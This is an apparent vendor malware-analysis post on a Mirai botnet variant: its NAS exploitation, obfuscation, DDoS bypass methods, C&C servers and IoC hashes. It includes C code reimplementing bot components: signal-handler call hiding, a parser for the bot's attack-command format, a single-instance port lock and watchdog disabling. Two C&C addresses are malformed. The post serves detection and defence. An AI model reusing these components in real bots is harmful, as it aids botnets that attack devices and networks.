How are Mirai variants infecting the IoT landscape?

Avira Protection Labs, 2 weeks ago

That malware evolves is nothing new, but some evolve more than others. Particularly Mirai.

We’ve previously looked at how Mirai, an IoT botnet, has changed since its source code became public, and recent analysis of IoT attacks and malware trends shows that Mirai has continued its evolution. The result is an increase in attacks using Mirai variants, as unskilled attackers can now assemble malicious botnets with relative ease.

The Avira IoT honeypot recently captured samples that are modified variants of Mirai. Our initial analysis found that these samples are very close to Mirai, with one small but obvious change: the token in the “/bin/busybox <TOKEN>” command is “CORONA”. (Mirai sends this command after a telnet login to confirm it has a working shell, expecting the “<TOKEN>: applet not found” reply; the original source used the token “ECCHI”.) The IoT researchers at Avira therefore named this variant ‘Mirai Corona’.

In the screenshot below, the attacker links this Mirai variant to the Corona pandemic with the message “Total lockdown is the solution”. Under the hood it is still Mirai; what is new is that this variant also targets NAS devices, exploiting CVE-2020-9054, a pre-authentication command injection in the weblogin.cgi of ZyXEL NAS firmware.

This post presents a detailed analysis of how this new Mirai variant exploits vulnerabilities in the IoT landscape, along with its new C&C servers.

Analysis of the Mirai variant

The core functionality of Mirai does not change in this version. However, we observed a few changes that are worth mentioning:

Notable features:

  • Different control-flow obfuscation
  • Custom string encryption/decryption routine
  • Packet construction from C&C-supplied parameters, plus DDoS-mitigation bypass attack routines

Different control flow obfuscation

Instead of the simple fork() technique used by the original, this variant uses a very different kind of control-flow obfuscation. The main code block that reaches the encryption handler is entirely different: the handler is registered through rt_sigaction, the system call that changes the action taken when a specific signal is delivered, so execution enters it via signal delivery rather than a direct call. A static call graph therefore shows no path from the main loop to the decryption code; the analyst has to follow the function pointer passed to rt_sigaction instead.
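To show how signal registration hides a call edge, here is an added example that is not code from the sample or from Avira: it installs a handler with sigaction() (the libc wrapper over rt_sigaction on Linux) and then triggers it with raise(). The handler body is a placeholder that only assembles the busybox check string; the sample's real decryption routine is not reproduced, and the signal number and function names are my choices.

```c
/* Added example (not the sample's code): routing execution through a signal
 * handler installed with sigaction(), i.e. the rt_sigaction system call on Linux.
 * main() only calls sigaction() and raise(); the edge into hidden_stage() exists
 * at run time, through the kernel, and not in a static call graph. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>

static volatile sig_atomic_t g_stage_done = 0;
static char g_cmd[32];

/* The "real" work. No function in this file calls it directly.
 * Placeholder payload: assemble the busybox check string the sample uses. */
static void hidden_stage(void)
{
    const char *s = "/bin/busybox CORONA";
    size_t i = 0;
    for (; s[i] != '\0' && i < sizeof g_cmd - 1; i++)
        g_cmd[i] = s[i];
    g_cmd[i] = '\0';
    g_stage_done = 1;
}

static void on_sigusr1(int signo)
{
    (void)signo;
    hidden_stage();      /* keep handler work async-signal-safe: no malloc, no stdio */
}

/* Install the handler and trigger it. raise() in a single-threaded process returns
 * only after the handler has run, so the result is ready when it returns.
 * Returns 1 when the hidden stage executed, 0 if it did not, -1 on install error. */
int install_and_trigger(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigusr1;            /* this pointer is what an analyst must follow */
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;
    if (sigaction(SIGUSR1, &sa, NULL) != 0)   /* rt_sigaction(SIGUSR1, ...) under strace */
        return -1;
    if (raise(SIGUSR1) != 0)
        return -1;
    return g_stage_done ? 1 : 0;
}

const char *hidden_command(void)
{
    return g_cmd;
}

int main(void)
{
    if (install_and_trigger() == 1)
        printf("handler ran, assembled command = \"%s\"\n", hidden_command());
    return 0;
}
```

Compiled and run, main() prints the assembled string although nothing in the program calls hidden_stage() directly. When triaging a stripped, statically linked bot binary, the address passed as sa_handler in each rt_sigaction call is the entry point to follow; under strace the registration appears as rt_sigaction(SIGUSR1, {sa_handler=…}, NULL, 8).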

Custom encryption/decryption technique

In the image below, the variant can be seen communicating with its C&C, but before doing so it decrypts a set of strings (commands and credentials). Instead of the simple XOR that the original Mirai applies to its string table, it uses a custom routine.

After initialization and string decryption, the variant starts communicating with its C&C server.

DDoS-mitigation bypass and packet construction

The botnet has an attack_parsing() function that selects the DDoS attack method (UDP, TCP, UDPbypass or TCPbypass) and reads the parameters the C&C server sends with the command (SYN, ACK, URG and RST flags, attack time, destination port and header length) to construct the attack packets.

The TCPbypass and UDPbypass routines are attack methods built to get past DDoS mitigation on the target (hence “bypass”); they set this sample apart from ordinary Mirai builds, whose attack table contains no such methods.
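As an added example (not the variant's code and not Avira's), the following C parser reads an attack command in the layout the public Mirai source uses for attack_parse() in bot/attack.c: duration, method id, target list, then key/length/value options whose values are ASCII numbers. The variant's attack_parsing() descends from that function, but its exact wire format is not published here, so the layout is an assumption about this sample; the option key numbers are Mirai's ATK_OPT_* constants, and the sample command bytes are constructed for the example, not captured from a C&C.

```c
/* Added example, not code from the analysed sample: a bounds-checked parser for the
 * attack command layout of the public Mirai source (attack_parse() in bot/attack.c).
 * Layout (multi-byte fields big-endian): duration u32 | vector u8 | ntargets u8 |
 * (ip u32, netmask u8) x ntargets | nopts u8 | (key u8, len u8, value[len]) x nopts.
 * Option values are ASCII numbers ("80", "1"); keys are Mirai's ATK_OPT_* numbers. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { OPT_DPORT = 7, OPT_URG = 11, OPT_ACK = 12, OPT_PSH = 13,
       OPT_RST = 14, OPT_SYN = 15, OPT_FIN = 16 };

/* TCP header flag bit set by each flag option (RFC 793 layout); 0 = not a flag option. */
static const uint8_t FLAG_BIT[17] = { [OPT_FIN] = 0x01, [OPT_SYN] = 0x02, [OPT_RST] = 0x04,
                                      [OPT_PSH] = 0x08, [OPT_ACK] = 0x10, [OPT_URG] = 0x20 };

struct attack_cmd {
    uint32_t duration;      /* seconds: the "time" parameter */
    uint8_t  vector;        /* attack method id in the bot's method table */
    uint32_t target_ip;     /* first target only, host byte order */
    uint8_t  target_mask;   /* CIDR prefix length */
    uint16_t dport;         /* 0 = random destination ports, as in Mirai */
    uint8_t  tcp_flags;     /* flag byte for the crafted TCP header */
};

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Decimal ASCII to int, -1 on junk or overflow (Mirai's atoi() silently accepts both). */
static int opt_int(const uint8_t *v, uint8_t n)
{
    int x = 0;
    if (n > 9) return -1;
    for (uint8_t i = 0; i < n; i++) {
        if (v[i] < '0' || v[i] > '9') return -1;
        x = x * 10 + (v[i] - '0');
    }
    return x;
}

/* 0 on success, -1 on a malformed or truncated command. Every read is length-checked
 * first, and trailing bytes are rejected rather than silently ignored. */
int parse_attack(const uint8_t *buf, size_t len, struct attack_cmd *out)
{
    size_t off = 0;
    memset(out, 0, sizeof *out);
    if (len < 6) return -1;
    out->duration = rd32(buf);  off += 4;
    out->vector   = buf[off++];
    uint8_t ntargets = buf[off++];
    if (ntargets == 0) return -1;
    for (uint8_t i = 0; i < ntargets; i++, off += 5) {
        if (len - off < 5) return -1;
        if (i == 0) { out->target_ip = rd32(buf + off); out->target_mask = buf[off + 4]; }
    }
    if (len - off < 1) return -1;
    uint8_t nopts = buf[off++];
    for (uint8_t i = 0; i < nopts; i++) {
        if (len - off < 2) return -1;
        uint8_t key = buf[off], vlen = buf[off + 1];
        off += 2;
        if (len - off < vlen) return -1;
        int v = opt_int(buf + off, vlen);
        if (v < 0) return -1;
        if (key == OPT_DPORT) { if (v > 65535) return -1; out->dport = (uint16_t)v; }
        else if (v != 0 && key < 17) out->tcp_flags |= FLAG_BIT[key];  /* other keys: no-op */
        off += vlen;
    }
    return off == len ? 0 : -1;
}

/* Constructed sample, not captured traffic: 60 s, vector 1, 10.0.0.5/32, dport 80, SYN+ACK. */
size_t build_sample_cmd(uint8_t *buf, size_t cap)
{
    static const uint8_t sample[] = {
        0x00, 0x00, 0x00, 0x3c, 0x01, 0x01,   /* duration 60, vector 1, one target */
        0x0a, 0x00, 0x00, 0x05, 0x20,         /* 10.0.0.5 /32 */
        0x03, OPT_DPORT, 0x02, '8', '0',      /* three options: dport "80", ... */
        OPT_SYN, 0x01, '1', OPT_ACK, 0x01, '1',
    };
    if (cap < sizeof sample) return 0;
    memcpy(buf, sample, sizeof sample);
    return sizeof sample;
}

int main(void)
{
    uint8_t buf[64];
    struct attack_cmd c;
    size_t n = build_sample_cmd(buf, sizeof buf);
    if (parse_attack(buf, n, &c) == 0)
        printf("duration=%u vector=%u target=%08x/%u dport=%u tcp_flags=0x%02x\n",
               c.duration, c.vector, c.target_ip, c.target_mask, c.dport, c.tcp_flags);
    printf("same command truncated by one byte -> %d\n", parse_attack(buf, n - 1, &c));
    return 0;
}
```

The intact sample parses to duration 60, destination port 80 and TCP flags 0x12 (SYN+ACK); the same bytes with the last one dropped are rejected instead of being read past the end. The original bot's parser does check lengths, but the strict rejection of trailing bytes and of non-numeric option values is this example's addition.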

Below are the call graphs for the TCPbypass and UDPbypass routines and for packet construction in the attack_parsing() function:

Apart from that, the usual Mirai housekeeping is present: the bot talks to /dev/watchdog to stop the hardware watchdog from rebooting the device (the original Mirai does this with a WDIOC_SETOPTIONS ioctl carrying WDIOS_DISABLECARD).

The variant’s cleaner_get_name(), killer_kill_by_cmdline() and killer_kill_by_permission() functions let the bot kill competing processes by name string, by process command line and by file permission respectively. It also binds TCP port 28341 to make sure only one instance runs on an infected device. The bot scans random hosts on TCP port 23 (telnet) for brute-forcing and phones back to its C&C server once a login attempt succeeds.
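The two housekeeping steps just described, as an added example written the way the public Mirai source does them. This is not the sample's code: port 28341 is taken from the analysis above, but binding to loopback (Mirai binds all interfaces) and the function names are my choices, and the killer and telnet scanner are not reproduced.

```c
/* Added example (not code from the analysed sample): single-instance check via a
 * fixed TCP port, and the watchdog disable, as the public Mirai source does them.
 *
 * WARNING: opening /dev/watchdog ARMS the hardware watchdog on real devices. If
 * the disable ioctl is refused and the fd is closed without the 'V' magic close,
 * the box reboots when the timer expires. Call disable_watchdog() only in a VM. */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/watchdog.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <unistd.h>

/* Bind a fixed TCP port; a second copy of the bot gets EADDRINUSE and exits.
 * Returns the listening fd (kept open for the process lifetime), -1 when another
 * instance already holds the port, -2 on any other error. */
int ensure_single_instance(uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -2;
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family      = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);   /* Mirai uses INADDR_ANY */
    addr.sin_port        = htons(port);
    if (bind(fd, (struct sockaddr *)&addr, sizeof addr) != 0 || listen(fd, 1) != 0) {
        int e = errno;
        close(fd);
        return e == EADDRINUSE ? -1 : -2;
    }
    return fd;
}

/* Ask the watchdog driver to stop its timer: WDIOC_SETOPTIONS with WDIOS_DISABLECARD,
 * which is ioctl 0x80045704 with the value 1 in Mirai binaries. Returns 0 if the
 * driver accepted it, -1 if the device is absent or refused; in the latter case the
 * 'V' magic close asks the driver to stop the timer when the fd is closed. */
int disable_watchdog(const char *dev)
{
    int fd = open(dev, O_WRONLY);
    if (fd < 0) return -1;
    int opt = WDIOS_DISABLECARD;
    int rc = ioctl(fd, WDIOC_SETOPTIONS, &opt);
    if (rc != 0 && write(fd, "V", 1) < 0) { /* best effort only */ }
    close(fd);
    return rc == 0 ? 0 : -1;
}

int main(int argc, char **argv)
{
    int fd = ensure_single_instance(28341);
    if (fd == -1) { fprintf(stderr, "another instance holds port 28341\n"); return 1; }
    if (fd < 0)   { perror("bind"); return 1; }
    printf("single-instance port 28341 held on fd %d\n", fd);
    /* Only touch a watchdog device if one is named explicitly on the command line. */
    if (argc > 1)
        printf("disable_watchdog(%s) -> %d\n", argv[1], disable_watchdog(argv[1]));
    close(fd);
    return 0;
}
```

Both behaviours double as cheap indicators on a device: a listener on TCP 28341 that no legitimate service accounts for, and an unexpected open of /dev/watchdog by a process that is not the platform's watchdog daemon.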

Once the malware is up, it sends a beacon to a C&C server on a specific port, notifying the C&C that it is ready to execute commands on the device. During our analysis we found the following C&C servers:

  • 104[.]218.50.89
  • 167[.]86.126.28
  • 185[.]125.230.11
  • 84[.]196.75
  • 148[.]120.105

Conclusion

It is important to safeguard IoT endpoints installed in consumer environments. It is the industry’s responsibility, and the consumer’s, to ensure that IoT devices are reliable products, ship with strong authentication credentials and are regularly patched.

The Avira IoT Research team monitors such new malware families and variants and provides detections for them. Integrating Avira SafeThings and anti-malware technologies can help protect customers from such attacks.

IoCs

Samples analysed, one per line (SHA-256 hash, where the sample was obtained, executable format, target architecture, debugging info):

Sample hash (SHA-256) | Source | Executable format | Target architecture | Debugging info
013ca1e05699062db31011d73c217ed3d2aa543ff16e43fb3886dd98202b26ab Honeypot ELF 32-bit LSB executable ARM stripped
0584cbbec12e87d576a7379e8940b4040cdb8d6a2c4d3956b482960347bdb90a Honeypot ELF 32-bit LSB executable ARM stripped
08a74b717b01f42221fad7b2dc1e9d918283c680d6d3c6c85f2af929645475eb Honeypot ELF 32-bit LSB executable ARM stripped
09fdad7129c182457b8c3b9e4f25a9c741e61cfe809301f44e13f77cfb3462e6 Honeypot ELF 32-bit LSB executable ARM stripped
0be67ed20c038a2aac9e2f7733df4c005c8b8f0974cc8add170d211657aad106 Honeypot ELF 32-bit LSB executable ARM stripped
12bd8ea2aa201703fb59f49d48d4d9488f62c66c763c077013ccac0ed2ca5f1e Honeypot ELF 32-bit LSB executable ARM stripped
167c0e763c3f998890a7d16f680283e8800d096e09273e58539236533047d473 Honeypot ELF 32-bit LSB executable ARM stripped
17fc8cae53461774c2db746472adbf66ab4c2cdd41a1fd761052ef9e28fdd8f8 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
1ea9bb247a4ec60242847f572ef0384c80b014fa972f4fa5cb6373a7ab1b0de8 VirusTotal ELF 32-bit LSB executable ARM stripped
284e35bcaa498d885f366107025f06ef14b0358621889c73b640eae031225588 VirusTotal ELF 32-bit MSB executable MIPS stripped
3308ebcd96bd42e15128fa68db7be71004b5f406f214c3d3d6c202883034d252 VirusTotal ELF 32-bit LSB executable ARM stripped
346100885bfcfbb3f6995150ef21cfd905ade6485d1db304462d07810367032e VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
34fe6476bbbd1c357119cc137c42eaed1ad96d72dfb07be5a252dbac827d49f0 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
3c41de8bcf24966f383eca595617d93c3e112fcb20b37b3c03e0aaa5e24839f6 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
3fc6d131685d84cda3791de96a9b10918b9a310467236b4216ad10f98abbe3f4 VirusTotal ELF 32-bit MSB executable Motorola m68k stripped
4717e940f41ed3d377dfb95ec0092400b26d5c8101603c13bce390a92a7c0d83 VirusTotal ELF 32-bit LSB executable ARM stripped
3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
48aabb4ac83cebe9aec6af359a2e10af0ed112fc3936f8c4149a3838e6dfc426 VirusTotal ELF 32-bit MSB executable MIPS stripped
575a28ca439411a40d8cf0f381c6f0c1889a8a08627d2135ff28b9dfd8e2dc6c VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
6a651d67be24382c9328b6de7829dc861a6958ff38e4260abb35e16b8f60666a VirusTotal ELF 32-bit LSB executable ARM stripped
6e533d390048e1bb3157c0aa6a429195698515cf2bcd99fb2276d202a2e6c2c4 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
6f8026820c63c92e610de15e771e8d00826bd5050a3c4b06210e23f6fc68868b VirusTotal ELF 32-bit LSB executable ARM stripped
7854e35610ead6f1010ccd1858c6b6ecb19c34c149c6326c10e7016202767711 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
8851b330a6bf5d2efade40a0262553e2a57bc3d3416f4f29f9f7bd1e5634edcb VirusTotal ELF 32-bit MSB executable SPARC stripped
8ca2c4c8236f159d55ee2160ed20bc69b51f93990898e6ecfea506ff3cdeca4a VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
8ca3f4dd7ad0d01f3cd6a34fa060af33c3c840ccf6f368f294f0e50f380ec52f VirusTotal ELF 32-bit LSB executable MIPS stripped
93b75a6f4d1e6880d1dd08de14137a1685be0cf70dae05b89f74d3c83820a7ef VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
9b45260b5b5157a70dd7d8835b88b503f091f4ca1b64d7518843f41e14f986d7 VirusTotal ELF 32-bit MSB executable MIPS stripped
9bf2754afc362510ece8cfaa6062c70e4aee001ab2fd011f7a01dc35399db495 VirusTotal ELF 32-bit LSB executable ARM stripped
a07d2c5c94a8048205cd24cff34195e3eed1534044772386b7b94a9e84f8ea2c VirusTotal ELF 32-bit LSB executable ARM stripped
aa4caeb4f22998fdb7bb5a77e6cb75f9ddc5f598902c5f4f26842d060af08a37 VirusTotal ELF 32-bit LSB executable ARM stripped
aede29b4914344f00998d2e3183d005bee886a81f0e430536cf0a842ecdde4bd VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
b37d62fb74bf89921dbbdcea8bb8f5a85bc4b2bbf002146c651921bdbf96e745 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde VirusTotal ELF 32-bit LSB executable ARM with debug_info
ca957197780b9e40d550828024377888130735c31815716106b0be65b80c51f1 VirusTotal ELF 32-bit LSB executable MIPS stripped
cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 VirusTotal ELF 32-bit LSB executable ARM with debug_info
d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
dc65a17134774b13b898af7af3197fdab765de8770d92fdf2967dc9d382b0a08 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e226bc964e31fb835ea2ae5fcd697d16a6e693557bf46bda43d0bf71f151d6c1 VirusTotal ELF 32-bit LSB executable MIPS stripped
e25521b6d5c974a8844d55a7f67b9ad6fc15129a7d6988695c01f25da06e9308 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e7f8389e88e6d336666ca9572829e88fddcdd2ceb532a305effaaff8514769cd VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e9dfa336a668c6d33352860d9443062446af41239edb0c6a9ec49213a6713534 VirusTotal ELF 32-bit LSB executable MIPS stripped
